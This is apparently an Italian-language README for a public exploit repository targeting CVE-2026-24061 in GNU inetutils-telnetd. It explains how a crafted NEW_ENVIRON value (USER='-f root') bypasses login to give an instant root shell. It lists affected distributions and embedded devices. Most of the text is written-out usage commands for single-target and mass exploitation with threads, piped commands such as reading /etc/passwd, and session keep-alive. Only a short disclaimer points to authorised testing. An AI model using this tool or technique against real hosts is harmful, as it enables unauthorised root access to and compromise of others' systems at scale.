
Exploit di bypass dell'autenticazione remota per GNU inetutils-telnetd (CVE-2026-24061) che utilizza l'iniezione CRLF per ottenere istantaneamente una shell di root. Supporta sfruttamento singolo/massivo, multi-threading, porte personalizzate, modalità pipe e keep-alive della sessione.

Edizione GNU inetutils-telnetd - Iniezione CRLF per Bypass dell'Autenticazione e Root Shell Immediata
Questo exploit sfrutta CVE-2026-24061, una vulnerabilità critica di bypass dell'autenticazione remota in GNU inetutils-telnetd. Iniettando un payload NEW_ENVIRON opportunamente modificato con USER='-f root', aggira l'autenticazione e fornisce una root shell immediata senza alcuna credenziale.
Nota: Lo script
basic_exploit.shè una versione semplificata e più veloce diexploit.sh; tuttavia, per la piena funzionalità si consigliaexploit.sh.
| Categoria | Funzionalità |
|---|---|
| Sfruttamento | ✅ Bypass dell'Autenticazione tramite Iniezione CRLF ✅ Root Shell Immediata ✅ Iniezione Utente Personalizzata (-f admin, -f user) |
| Scansione | ✅ Sfruttamento di un Singolo Bersaglio ✅ Sfruttamento di Massa da File ✅ Multi-Threading (thread configurabili) ✅ Supporto Porta Personalizzata |
| Avanzate | ✅ Modalità Pipe (esecuzione comandi tramite stdin) ✅ Keep-Alive della Sessione ✅ Meccanismo di Retry ✅ Controllo Timeout |
| Usabilità | ✅ Output Colorato (colorama) ✅ Doppio Linguaggio (Python & Bash) ✅ Modalità Verbose/Debug |
| Prodotto | Versioni |
|---|---|
| GNU inetutils-telnetd | 1.9.3 - 2.7 |
| Distribuzioni Linux interessate | Debian, CentOS, Ubuntu e le loro distribuzioni derivate. (Zorin OS, Linux Mint, Pop!_OS ed Elementary OS) |
| Dispositivi Embedded | NAS, IoT, Router |
⚠️ Disclaimer: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a fini educativi. L'accesso non autorizzato è illegale.
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit
# Python version
pip3 install -r requirements.txt
# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh
# Python version
python3 exploit.py -u 192.168.1.100
# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323
# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt
# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20
# Bash version
./exploit.sh -l targets.txt -m 20
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100
# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v
# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5
# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive
| Breve | Lungo | Descrizione | Default |
|---|---|---|---|
-u | --url | Indirizzo IP del bersaglio | Obbligatorio |
-p | --port | Porta del bersaglio | 23 |
-l | --list | File contenente l'elenco dei bersagli | Nessuno |
-m | --max-threads | Numero massimo di thread per lo sfruttamento di massa | 10 |
-usr | --username | Nome utente da iniettare | root |
-t | --timeout | Timeout del socket (secondi) | 10 |
-r | --retries | Numero di tentativi di retry | 3 |
-v | --verbose | Abilita output di debug | False |
--keep-alive | Mantieni la sessione attiva dopo lo sfruttamento | False |
Dai un'occhiata agli altri miei repository di exploit: